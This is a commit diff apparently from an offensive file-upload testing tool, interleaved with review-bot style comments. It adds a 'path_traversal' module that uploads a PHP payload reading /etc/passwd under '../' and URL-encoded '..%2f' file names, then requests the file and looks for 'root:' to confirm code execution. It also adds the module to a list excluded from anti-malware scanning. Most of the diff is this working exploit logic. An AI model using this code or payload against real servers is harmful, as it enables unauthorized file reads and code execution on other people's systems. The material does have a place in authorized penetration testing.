A new module named path traversal is added.
sAjibuu committed Apr 3, 2024
1 parent af5720e commit 7d55b7a
Showing 5 changed files with 94 additions and 3 deletions.
1 change: 1 addition & 0 deletions assets/samples/passwd_sample.php
@@ -0,0 +1 @@
<?php echo file_get_contents('/etc/passwd'); ?>
4 changes: 2 additions & 2 deletions config/version.json
@@ -1,4 +1,4 @@
{
"current_version": "v3.0.4#dev",
"current_version": "v3.0.5#dev",
"latest_version": "v3.0.4#dev"
}
}
3 changes: 2 additions & 1 deletion lib/config.py
Expand Up @@ -18,12 +18,13 @@
"null_byte_cutoff",
"name_overflow_cutoff",
"htaccess_overwrite",
"path_traversal",
"svg_xxe",
"svg_xss"
]

# Modules that you do not want to scan with Anti-Malware and Detection mode
dont_scan_module = ['svg_xss', 'svg_xxe', 'htaccess_overwrite']
dont_scan_module = ['svg_xss', 'svg_xxe', 'htaccess_overwrite', "path_traversal"]

# Modules that you want their orginal filename and extension - Don't touch unless you know what you are doing
original_filenames = ['stripping_extension']
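Review bot: The entry added to `dont_scan_module` is double-quoted while every sibling in that list is single-quoted, whereas the `"path_traversal",` entry in the module list above matches its double-quoted neighbours, so only this line breaks the file's pattern. `dont_scan_module = ['svg_xss', 'svg_xxe', 'htaccess_overwrite', 'path_traversal']` keeps the list uniform. The module list the first addition belongs to opens above the hunk.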
2 changes: 2 additions & 0 deletions lib/list_modules.py
Expand Up @@ -33,6 +33,8 @@ def list_all_modules():
print("_" * terminal_width)
print(f"\033[1m\nhtaccess_overwrite\033[0m:\n\nOver-writing the .htaccess rules to allow arbitrary file extension in the current directory and its sub-directories.")
print("_" * terminal_width)
print(f"\033[1m\npath_traversal\033[0m:\n\nBypassing .htaccess rules that apply in the current directory by uploading a file in a parent directory using path traversal vulnerability.")
print("_" * terminal_width)
print(f"\033[1m\nsvg_xxe\033[0m:\n\nUploading SVG with XML-External-Entity that reads the passwd file system.")
print("_" * terminal_width)
print(f"\033[1m\nsvg_xss\033[0m:\n\nUploading SVG with Cross-Site Scripting that executes an alert popup.")
87 changes: 87 additions & 0 deletions lib/modules.py
Expand Up @@ -443,6 +443,93 @@ def htaccess_overwrite(request_file, options, allowed_extension, function_number
overall_progress)


def path_traversal(request_file, options, allowed_extension, function_number, total_functions, internal_progress=None, internal_total_iterations=None, leftover_extensions=None):
extension_to_test = options.file_extension
module = 'path_traversal'

info("Executing path traversal module.")

# Check if the file extension being tested is PHP (it works only with php)
if extension_to_test.lower() == 'php':

def build_url(url, file_name, decode=None):
from urllib.parse import urljoin
from urllib.parse import unquote
upload_dir = options.upload_dir
if options.upload_dir.endswith("=/"):
upload_dir = options.upload_dir[:-1]

if decode:
decoded_filename = unquote(file_name)
final_url = urljoin(url, upload_dir + decoded_filename)
else:
final_url = urljoin(url, upload_dir + file_name)

if "https://" in final_url:
final_url = final_url.replace("https", options.protocol)
else:
final_url = final_url.replace("http", options.protocol)

response, _ = send_get_request(headers, options, final_url)

return response

# Upload .htaccess file that overwrite the existing .htaccess and processes .arbit as PHP
with open("assets/samples/passwd_sample.php", 'rb') as file:
file_data = file.read()

# Calculate the progress bar
overall_progress = (function_number - 1) / total_functions * 100 + (1 / 1) / total_functions * 100

# Upload an arbitrary file extension
php_file_extension = f".php"
magic_bytes = False
mimetype = config.mimetypes["php"]
file_name = "../" + generate_random_string(10) + php_file_extension
skip_module = True # Do not exit when a successful upload is occurred
headers, upload_status, response, url, _, current_time, user_options = file_upload(request_file, file_name,
php_file_extension, options,
magic_bytes, allowed_extension,
mimetype, module,
overall_progress, file_data,
skip_module)
if options.upload_dir != 'optional':

response = build_url(url, file_name)

if upload_status == 'success':
if "root:" not in response.text:
file_name = r"..%2f" + generate_random_string(10) + php_file_extension
headers, upload_status, response, url, _, current_time, user_options = file_upload(request_file, file_name,
php_file_extension, options,
magic_bytes, allowed_extension,
mimetype, module,
overall_progress, file_data,
skip_module)
if upload_status == 'success':

decode = True
second_response = build_url(url, file_name, decode)
if "root:" in second_response.text:
_, _, _, _, _, _, _ = file_upload(request_file, file_name, extension_to_test, options,
magic_bytes, allowed_extension, mimetype, module,
overall_progress)

else:
printing(options, user_options, response, file_name, 100, current_time, module, magic_bytes, mimetype)
warning(f"It seems like the app is not vulnerable to path traversal.")
return

elif "root:" in response.text:
_, _, _, _, _, _, _ = file_upload(request_file, file_name, extension_to_test, options,
magic_bytes, allowed_extension, mimetype, module,
overall_progress)

else:
printing(options, user_options, response, file_name, 100, current_time, module, magic_bytes, mimetype)
warning(f"It seems like the app is not vulnerable to path traversal.")
return

def svg_xxe(request_file, options, allowed_extension, function_number, total_functions, internal_progress=None, internal_total_iterations=None, leftover_extensions=None):
module = 'svg_xxe'
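Review bot: The comment `# Upload .htaccess file that overwrite the existing .htaccess and processes .arbit as PHP` above the `open("assets/samples/passwd_sample.php", 'rb')` call is carried over from htaccess_overwrite and describes a different file; `# Read the PHP sample that is uploaded under a traversal-prefixed file name` states what this block actually does. When `extension_to_test.lower()` is not `'php'` the function falls straight through after the info line and returns None with no message, so an `else:` branch with `warning("path_traversal module runs only for the php extension; skipping.")` would tell the user why nothing was tested. `f".php"` and the two `f"It seems like the app is not vulnerable to path traversal."` strings contain no placeholders and can be plain literals. The `_, _, _, _, _, _, _ = file_upload(...)` unpacking at both success branches discards every value and reads more simply as a bare call. path_traversal sits entirely inside the hunk; svg_xxe, whose first lines close it, continues outside.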

